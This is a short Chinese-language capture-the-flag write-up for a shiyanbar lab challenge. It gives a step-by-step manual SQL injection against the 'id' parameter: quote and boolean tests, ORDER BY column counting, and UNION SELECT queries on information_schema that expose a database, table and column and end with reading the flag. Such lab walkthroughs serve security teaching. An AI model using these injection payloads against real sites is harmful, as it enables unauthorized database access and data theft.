题目链接:http://ctf5.shiyanbar.com/8/index.php?id=1
手动注入
-
判断是否存在sql注入
ctf5.shiyanbar.com/8/index.php?id=1'
报错
ctf5.shiyanbar.com/8/index.php?id=1 and 1=1
正常打开
ctf5.shiyanbar.com/8/index.php?id=1 and 1=2
正常打开
存在sql注入 -
判断POC
http://ctf5.shiyanbar.com/8/index.php?id=1 or 1=1
-
查询字段数
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 1
正常显示
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2
正常显示http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3
报错
字段数为2 -
查询数据库
http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union select 1,schema_name from information_schema.schemata limit 0,2
查到数据库 my_db -
查询数据表
http://ctf5.shiyanbar.com/8/index.php?id=1 union select table_schema,table_name from information_schema.tables
查到数据表 thiskey -
查询表
http://ctf5.shiyanbar.com/8/index.php?id=1 union select table_name,column_name from information_schema.columns
查到表 k0y -
读取值
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
读到值 whatiMyD91dump